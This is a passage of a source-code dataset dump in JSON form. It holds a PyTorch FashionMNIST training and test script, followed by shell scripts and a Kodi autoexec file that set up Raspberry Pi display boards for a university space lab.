self.conv2.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv2.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Linear layer1\n self.fc1= nn.Sequential()\n self.fc1.add_module(\"linear\", nn.Linear(in_features= 12*4*4, out_features= 120))\n # self.fc1.add_module(\"bn3\", nn.BatchNorm1d(num_features= 120, eps= 1e-05, momentum= 0.1, affine= True))\n self.fc1.add_module(\"relu\", nn.ReLU(inplace= False))\n \n # Linear layer2\n self.fc2= nn.Sequential()\n self.fc2.add_module(\"linear\", nn.Linear(in_features= 120, out_features= 60))\n #self.fc2.add_module(\"bn4\", nn.BatchNorm1d(num_features= 60, eps= 1e-5, momentum= 0.1, affine= True))\n self.fc2.add_module(\"relu\", nn.ReLU(inplace= False))\n\n # Output layer\n self.out= nn.Sequential()\n self.out.add_module(\"output\", nn.Linear(in_features= 60, out_features= 10))\n # by default activation function is softmax\n\n def forward(self, t):\n t= t\n t= self.conv1(t)\n t= self.conv2(t)\n t= t.reshape(-1, 12*4*4)\n t= self.fc1(t)\n t= self.fc2(t)\n t= self.out(t)\n return t\n\n\n# train test epochs\ndevice= torch.device('cuda')\nnetwork= Network()\ntrain_loader= torch.utils.data.DataLoader(train_set, batch_size= 5000)\ntest_loader= torch.utils.data.DataLoader(test_set, batch_size= 5000)\noptimizer= optim.Adam(network.parameters(), lr= 0.1)\ntest_batch= next(iter(test_loader))\n\n# gpu specific\n network.cuda()\n\nepochs= 200\nfor epoch in range(1, epochs):\n i= 0\n for batch in train_loader:\n i+=1\n images, labels= batch\n images= images.to('cuda')\n labels= labels.to('cuda')\n if epoch == 1 and i == 1:\n #First time check and resume checkpoint\n try:\n print('resuming')\n checkpoint = torch.load('model/checkpoint')\n network.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n epoch = checkpoint['epoch']\n loss = checkpoint['loss']\n network.train()\n print('epoch', epoch)\n except:\n pass\n \n # .to(cuda) for GPU\n\n preds= network(images)\n train_loss= func.cross_entropy(preds, labels)\n\n optimizer.zero_grad()\n train_loss.backward(retain_graph=True)\n optimizer.step()\n \n images, labels= test_batch\n # .to(cuda) for GPU\n images= images.to('cuda')\n labels= labels.to('cuda')\n preds= network(images)\n test_loss= func.cross_entropy(preds, labels)\n\n # checkpoint\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': network.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': test_loss,\n }, 'model/checkpoint')\n\n print('training on epoch: {} and batch: {}, train loss: {:.2f}, test loss: {:.2f}'.format(epoch, i, train_loss.item(), test_loss.item()))\n PATH= 'model/checkpoint_{:.2f}'.format(test_loss.item())\n torch.save(network.state_dict(), PATH)\n\n\n\n# final testing:\ndef get_num_correct(preds, labels):\n return torch.argmax(preds, dim= 1).eq(labels).sum()\n\nnetwork= network.eval()\ntest_loader= torch.utils.data.DataLoader(test_set, batch_size= 10000)\nimages, labels= test_batch\nimages= images.to('cuda')\nlabels= labels.to('cuda')\npreds= network(images)\nprint('correctly classified from 10000 images:', get_num_correct(preds, labels).item())\n\n" }, { "alpha_fraction": 0.6019600629806519, "alphanum_fraction": 0.639653205871582, "avg_line_length": 35.84722137451172, "blob_id": "39e4920a30af9c124db02bbe7c43639e7e8e7832", "content_id": "c279cbd77182459f6307557a743a61a3aecb2bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2653, "license_type": "no_license", "max_line_length": 113, "num_lines": 72, "path": "/test.py", "repo_name": "mridul-eecs/FashionMNIST_pytorch", "src_encoding": "UTF-8", "text": "import torch\nimport torchvision\nfrom torchvision.transforms import transforms\nfrom torch import nn\n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n # Convolutional layer1\n self.conv1= nn.Sequential()\n self.conv1.add_module(\"conv1\", nn.Conv2d(in_channels= 1, out_channels= 6, kernel_size= 5))\n self.conv1.add_module(\"bn1\", nn.BatchNorm2d(num_features= 6, eps= 1e-05, momentum= 0.1, affine= True))\n self.conv1.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv1.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Convolutional layer2\n self.conv2= nn.Sequential()\n self.conv2.add_module(\"conv2\", nn.Conv2d(in_channels= 6, out_channels= 12, kernel_size= 5))\n self.conv2.add_module(\"bn2\", nn.BatchNorm2d(num_features= 12, eps= 1e-05, momentum= 0.1, affine= True))\n self.conv2.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv2.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Linear layer1\n self.fc1= nn.Sequential()\n self.fc1.add_module(\"linear\", nn.Linear(in_features= 12*4*4, out_features= 120))\n # self.fc1.add_module(\"bn3\", nn.BatchNorm1d(num_features= 120, eps= 1e-05, momentum= 0.1, affine= True))\n self.fc1.add_module(\"relu\", nn.ReLU(inplace= False))\n \n # Linear layer2\n self.fc2= nn.Sequential()\n self.fc2.add_module(\"linear\", nn.Linear(in_features= 120, out_features= 60))\n #self.fc2.add_module(\"bn4\", nn.BatchNorm1d(num_features= 60, eps= 1e-5, momentum= 0.1, affine= True))\n self.fc2.add_module(\"relu\", nn.ReLU(inplace= False))\n\n # Output layer\n self.out= nn.Sequential()\n self.out.add_module(\"output\", nn.Linear(in_features= 60, out_features= 10))\n # by default activation function is softmax\n\n def forward(self, t):\n t= t\n t= self.conv1(t)\n t= self.conv2(t)\n t= t.reshape(-1, 12*4*4)\n t= self.fc1(t)\n t= self.fc2(t)\n t= self.out(t)\n return t\n\n\ntest_set= torchvision.datasets.FashionMNIST(\n train= False,\n root= '../data/FashionMNIST/test/',\n download= True,\n transform= transforms.Compose([transforms.ToTensor()])\n)\n\nPATH= 'model/checkpoint'\n\nprint(PATH)\nmodel= Network()\ndevice = torch.device(\"cpu\")\ncheckpoint = torch.load(PATH)\nmodel.load_state_dict(checkpoint['model_state_dict'])\nmodel.to(device)\nmodel= model.eval()\n\ntest_loader= torch.utils.data.DataLoader(test_set, batch_size= 1)\nbatch= next(iter(test_loader))\nimages, labels= batch\npred= model(images)\nprint(torch.argmax(pred), labels.item())\n" }, { "alpha_fraction": 0.8617021441459656, "alphanum_fraction": 0.8617021441459656, "avg_line_length": 46, "blob_id": "649e04b5ad257093c1f79ef6fdcba89ee9520361", "content_id": "24d6abfdbc60fb4acce28cc83e090490a334171b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 70, "num_lines": 2, "path": "/README.md", "repo_name": "mridul-eecs/FashionMNIST_pytorch", "src_encoding": "UTF-8", "text": "# FashionMNIST_pytorch\nFashion MNIST implementation on pytorch using dataset from torchvision\n" } ]
3
UMDSpaceSystemsLab/DisplayBoards
https://github.com/UMDSpaceSystemsLab/DisplayBoards
c19d5106636acd8e8ac94bd6d3c99e14ba1a10f9
d42aad6a15dfe9cc5a63dbb19efe112534b91a5e
aaa5683701d391558f475c12036e40bd9834c98b
refs/heads/master
2021-01-18T22:41:16.606620
2016-04-28T21:58:43
2016-04-28T21:58:43
42,799,066
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6304736137390137, "alphanum_fraction": 0.650580883026123, "avg_line_length": 25.630952835083008, "blob_id": "627fde388482ec4e184d5ed8ddcff2f49e97c9ea", "content_id": "f6b277853ace56a907da5edd63c8ac4d97a32f3b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2238, "license_type": "permissive", "max_line_length": 127, "num_lines": 84, "path": "/patch_image.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Image patcher for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [image-to-patch]\"\n\texit 1\nfi\n\nif [ ! -f \"$1\" ];then\n\tbecho \"ERROR: File '$1' does not exist!\"\n\texit 1\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Setting up environment...\"\n\nbbecho \"Preparing work directory...\"\nrm -rf workdir; cerr $?\nmkdir -p workdir; cerr $?\n\nbbecho \"Entering work directory...\"\ncd workdir; cerr $?\n\nbecho \"Extracting image...\"\nunsquashfs \"$SCRIPT_DIR/$1\"; cerr $?\n\nbecho \"Backing up original image...\"\nmv \"$SCRIPT_DIR/$1\" \"$SCRIPT_DIR/$1.backup\"; cerr $?\n\nbecho \"Entering image directory...\"\ncd squashfs-root; cerr $?\n\nbecho \"Patching image...\"\n\n## Place any filesystem modifying commands here!\nbbecho \"Removing systemd version service...\"\nrm usr/lib/systemd/system/show-version.service; cerr $?\nbbecho \"Replacing splash screen with SSL one...\"\ncp \"$SCRIPT_DIR/resources/Splash.png\" usr/share/kodi/media/Splash.png; cerr $?\ncp \"$SCRIPT_DIR/resources/Splash.png\" usr/share/xbmc/media/Splash.png; cerr $?\n## END filesystem modifying commands.\n\nbecho \"Exiting image directory...\"\ncd ..; cerr $?\n\nbecho \"Rebuilding image...\"\nmksquashfs squashfs-root \"$SCRIPT_DIR/$1\" -b 1024k -comp lzo; cerr $?\n\nbecho \"Exiting environment...\"\ncd ..; cerr $?\n\nbecho \"Restoring permissions on image file...\"\nchown --reference=\"$SCRIPT_DIR/$1.backup\" \"$SCRIPT_DIR/$1\"; cerr $?\nchmod --reference=\"$SCRIPT_DIR/$1.backup\" \"$SCRIPT_DIR/$1\"; cerr $?\n\nbecho \"Finished patching image '$1'.\"\nbecho \"Patched directory in workdir/. Delete it if you don't need it.\"\n\n" }, { "alpha_fraction": 0.5868814587593079, "alphanum_fraction": 0.6237053871154785, "avg_line_length": 27.032258987426758, "blob_id": "74ec30098823575e5ea59af51c5b2e5c27117cf8", "content_id": "765fee7a12706cea457f50453829cc12d36fd675", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 869, "license_type": "permissive", "max_line_length": 127, "num_lines": 31, "path": "/install_oemsplash.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Configuration installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nbecho \"Installing OEM splash screen for SSL...\"\n\ncp resources/oemsplash.png \"$1\"; cerr $?\ncp resources/SSL.png \"$1\"; cerr $?\n\nbecho \"Finished installing OEM splash screen for SSL.\"\n" }, { "alpha_fraction": 0.67472243309021, "alphanum_fraction": 0.6838667392730713, "avg_line_length": 36.317073822021484, "blob_id": "2854833934107ddb8c4ab463bf96d12bcdfdbe8b", "content_id": "a356bc8ce558dfa0d3e8d0c089ac43e89f2367eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1531, "license_type": "permissive", "max_line_length": 119, "num_lines": 41, "path": "/README.md", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "# DisplayBoards\nThis is a repo for the SBC display computers attached to the numerous Television displayboards at the Space Systems Lab\n\n# Instructions\n\n 1. Install your favorite OpenELEC image first. Copy it to your SD card\n as such:\n \n sudo dd if=OpenELEC-RPi2.arm-6.0.3.img of=/dev/sdc bs=4M\n \n (Note - your OpenELEC image may vary!)\n\n 2. Unplug and boot with your RPi. Once it has booted (it says it wants to\n reboot), unplug it!\n\n 3. Set up your `SSL_DISPLAYBOARD_ARC_PASS` environment variable to the\n archive password, e.g.\n \n export SSL_DISPLAYBOARD_ARC_PASS=\"MyPasswordHere\"\n \n (It may be useful to store the above line in your `.bashrc`, or in a\n script that you can easily source.)\n\n 4. Mount the system and data partition, and run:\n \n ./install_all.sh /path/to/mounted/mini/system/partition /path/to/mounted/data/partition\n \n * If you want to enable (force) composite output, add `-c`:\n \n ./install_all.sh /path/to/mounted/mini/system/partition /path/to/mounted/data/partition -c\n \n * If you want to enable (force) 16:9 composite output, add `-w`:\n \n ./install_all.sh /path/to/mounted/mini/system/partition /path/to/mounted/data/partition -w\n \n 5. That's it! Go ahead and boot your shiny new SD card!\n \n 6. (OPTIONAL) If you are using composite mode, you can go into\n `System > Settings > System > Video Output > Video calibration...`\n to adjust the overscan. This would allow all of the contents of the\n screen to be seen.\n\n" }, { "alpha_fraction": 0.5864240527153015, "alphanum_fraction": 0.6123163104057312, "avg_line_length": 23.220338821411133, "blob_id": "4f3fbcf2446f239cf6b61b0194741f825177b25d", "content_id": "e37f790157f0e2e508a8dd1e57ce3d06a41f88c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1429, "license_type": "permissive", "max_line_length": 127, "num_lines": 59, "path": "/install_patched_image.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Patched image installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m -- $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo -E $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -p -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Cleaning up any old files...\"\nrm -f SYSTEM SYSTEM.backup; cerr $?\n\nbecho \"Copying original system image...\"\ncp \"$1/SYSTEM\" .; cerr $?\n\nbecho \"Patching image...\"\n\"$SCRIPT_DIR/patch_image.sh\" SYSTEM; cerr $?\n\nbecho \"Installing patched image...\"\ncp \"SYSTEM\" \"$1/SYSTEM\"; cerr $?\n\nbecho \"Finished installing patched system image for SSL.\"\n" }, { "alpha_fraction": 0.6191214323043823, "alphanum_fraction": 0.6454780101776123, "avg_line_length": 27.455883026123047, "blob_id": "05040c0c5c7416a51d5b2b48c8c7ff7f48def955", "content_id": "2f5b9c5906342fa4d2c74668099b9abb8f4a9f6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1935, "license_type": "permissive", "max_line_length": 127, "num_lines": 68, "path": "/build_config_archive.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Configuration archive creator for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\nARC=\"resources/kodi-config-enc.tar.7z\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-data-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ -z \"$SSL_DISPLAYBOARD_ARC_PASS\" ];then\n\tbecho \"ERROR: Variable SSL_DISPLAYBOARD_ARC_PASS not set! This is required to lock the archive!\"\n\texit 1\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo -E $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -p -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Creating configuration archive...\"\n\nbbecho \"Removing any old archives...\"\n[ -f \"$ARC\" ] && mv \"$ARC\" \"$ARC\".old && bbecho \"Created backup: kodi-config-enc.tar.7z.old\"\n\nbbecho \"Entering Kodi data partition directory...\"\ncd \"$1\"; cerr $?\n\nbbecho \"Creating \\033[32mencrypted\\033[0m\\033[1m configuration archive...\"\nsleep 3s\ntar cf - \".kodi\" \".cache\" | 7z a -si \"$SCRIPT_DIR/$ARC\" -mhe -p\"$SSL_DISPLAYBOARD_ARC_PASS\"\ncerr $?\n\nbbecho \"Returning to script directory...\"\ncd \"$SCRIPT_DIR\"; cerr $?\n\nbecho \"Restoring permissions on configuration archive...\"\nchown --reference=\"resources/oemsplash.png\" \"$SCRIPT_DIR/$ARC\"; cerr $?\nchmod --reference=\"resources/oemsplash.png\" \"$SCRIPT_DIR/$ARC\"; cerr $?\n\nbecho \"Finished creating Kodi configuration archive $ARC.\"\n" }, { "alpha_fraction": 0.6110183596611023, "alphanum_fraction": 0.6494156718254089, "avg_line_length": 30.526315689086914, "blob_id": "62ca2637cf5ebc3ea771a8daabaddd08e494e069", "content_id": "85ef87ae4eaa9648ac49cf149726a7fecdf96c54", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1198, "license_type": "permissive", "max_line_length": 127, "num_lines": 38, "path": "/install_display_config_rpi1_ratio169.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Composite display 16:9 ratio configuration installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m ** $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"1\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/config.txt\" ];then\n becho \"ERROR: Configuration file config.txt not found in system partition!\"\n becho \" Are you sure you specified the correct directory?\"\n exit 1\nfi\n\ngrep \"^sdtv_aspect\\=\" \"$1/config.txt\" 2>/dev/null >/dev/null\n\nif [ \"$?\" = \"0\" ];then\n becho \"ERROR: Configuration file config.txt already has configuration for composite ratio!\"\n exit 1\nfi\n\nbecho \"Installing composite display 16:9 ratio configuration for RPi1...\"\n\necho \"sdtv_aspect=3\" >> \"$1/config.txt\"\n\nbecho \"Finished installing composite display 16:9 ratio configuration for RPi1.\"\n" }, { "alpha_fraction": 0.7630661725997925, "alphanum_fraction": 0.7839721441268921, "avg_line_length": 34.875, "blob_id": "eec407e9c7ce495c82598b8d9dee2753fe52db9d", "content_id": "e7e5de1490089e2d1c26cb3990707d45f1dac450", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 287, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/resources/autoexec.py", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "# place at ~/.kodi/userdata/autoexec.py\nimport xbmc\nimport time\nxbmc.executebuiltin(\"XBMC.ReplaceWindow(1234)\")\ntime.sleep(0.1)\nxbmc.executebuiltin('PlayMedia(\"/storage/videos/SSL\",\"isdir\")')\nxbmc.executebuiltin('xbmc.PlayerControl(repeatall)')\nxbmc.executebuiltin(\"Action(Fullscreen)\")\n" }, { "alpha_fraction": 0.5516348481178284, "alphanum_fraction": 0.5778568983078003, "avg_line_length": 28.701923370361328, "blob_id": "dd0c648c57dd857e3e7a498ff3c44f7f9529e802", "content_id": "99d3828b4f7dcfbed8c396f92a7e5251fac25389", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3089, "license_type": "permissive", "max_line_length": 127, "num_lines": 104, "path": "/install_all.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Super installer for SSL DisplayBoard\n\nbecho() { echo -e \"\\033[1m == $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"2\" ] && [ \"$#\" != \"3\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition] [path-to-kodi-data-partition] [-c|-w]\"\n becho \" -c | --composite Force composite video output for RPi.\"\n becho \" You may also set ENABLE_COMPOSITE=1 to enable\"\n becho \" this option.\"\n becho \" -w | --composite169 Force 16:9 composite video output for RPi.\"\n becho \" You may also set ENABLE_COMPOSITE=2 to enable\"\n becho \" this option.\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -d \"$2\" ];then\n\tbecho \"ERROR: Path '$2' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nif [ -z ${ENABLE_COMPOSITE+x} ]; then\n if [ \"$#\" = \"3\" ]; then\n if [ \"$3\" = \"-c\" ];then\n becho \"Enabling composite for RPi.\"\n ENABLE_COMPOSITE=1\n elif [ \"$3\" = \"-w\" ];then\n becho \"Enabling 16:9 composite for RPi.\"\n ENABLE_COMPOSITE=2\n else\n becho \"Not enabling composite for RPi.\"\n ENABLE_COMPOSITE=0\n fi\n fi\nelse\n becho \"Using environment ENABLE_COMPOSITE = $ENABLE_COMPOSITE.\"\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo -E $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -p -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Step 1: Configuration archive\"\n\"$SCRIPT_DIR/install_config_archive.sh\" \"$2\"; cerr $?\n\nbecho \"Step 2: Patch system image\"\n\"$SCRIPT_DIR/install_patched_image.sh\" \"$1\"; cerr $?\n\nbecho \"Step 3: Install boot splash\"\n\"$SCRIPT_DIR/install_oemsplash.sh\" \"$1\"; cerr $?\n\nif [ \"$ENABLE_COMPOSITE\" = \"1\" ] || [ \"$ENABLE_COMPOSITE\" = \"2\" ]; then\n becho \"Step 4: Enable composite video output\"\n \"$SCRIPT_DIR/install_display_config_rpi1.sh\" \"$1\"; cerr $?\n \n if [ \"$ENABLE_COMPOSITE\" = \"2\" ]; then\n becho \"Step 5: Enable 16:9 aspect ratio for composite video output\"\n \"$SCRIPT_DIR/install_display_config_rpi1_ratio169.sh\" \"$1\"; cerr $?\n fi\nfi\n\nif [ -f \"$SCRIPT_DIR/post_install.sh\" ]; then\n \"$SCRIPT_DIR/post_install.sh\" \"$1\" \"$2\"; cerr $?\nfi\n\nbecho \"Unmounting system partition...\"\numount \"$1\"\n\nbecho \"Unmounting data partition...\"\numount \"$2\"\n\nbecho \"All done! You can safely remove your SD card and boot it!\"\n" }, { "alpha_fraction": 0.5671370029449463, "alphanum_fraction": 0.5867091417312622, "avg_line_length": 26.123456954956055, "blob_id": "d642c0cd5ffaa7ab92ed90126c5cb6de7c7e3a15", "content_id": "94d7aed545da90d76c6434e529998ba0f796cf6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2197, "license_type": "permissive", "max_line_length": 127, "num_lines": 81, "path": "/post_install.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Custom commands for SSL DisplayBoard\n# -------------------------------------\n# You can put custom commands for your own local setup here!\n# \n# $1 will have the system partition directory, and $2 will have the\n# data partition directory.\n# \n# You can add your commands in the custom section below.\n# \n# If you need to request root (especially if you're writing into the\n# data partition), set the option accordingly within the config\n# section.\n\n## START: Config section\n\n# REQUIRE_ROOT - whether we need root to run this script or not.\n# If 1, elevate permissions. If not, don't do anything.\nREQUIRE_ROOT=1\n\n## END: Config section\n\n## START: Bootstrap section\n## DO NOT CHANGE ANYTHING IN THIS SECTION\nbecho() { echo -e \"\\033[1m ++ $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"2\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition] [path-to-kodi-data-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -d \"$2\" ];then\n\tbecho \"ERROR: Path '$2' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nif [ \"$REQUIRE_ROOT\" = \"1\" ];then\n if [ ! \"`whoami`\" = \"root\" ];then\n becho \"You need to be root to use this tool.\"\n \n sudo_loc=`which sudo`\n if [ \"$?\" = \"0\" ];then\n becho \"Attempting to log into root with sudo.\"\n sudo -E $0 $@\n exit $?\n fi\n \n su_loc=`which su`\n if [ \"$?\" = \"0\" ];then\n becho \"Attempting to log into root with su.\"\n su -p -c \"$0 $@\"\n exit $?\n fi\n \n becho \"ERROR: You must be root to use this tool!\"\n exit 1\n fi\nfi\n\n## END: Bootstrap section\n\n## START: Custom section\n## Add your own scripts here!\n\n## END: Custom section\n## Add your own scripts here!\n" } ]
9
foocp/vibe-check
https://github.com/foocp/vibe-check
1954c84d8dd9aa69f36ef08c9dc5bdc150f87c54
23dfc875a58a5b450e32be99f837f5c7920ae9fe
0f603342a5406a0b23d2497fbd20921cf1b12f39
refs/heads/master
2023-05-08T17:42:25.765370
2021-05-26T19:58:49
2021-05-26T19:58:49
null
0
0
null
null
null
null
null
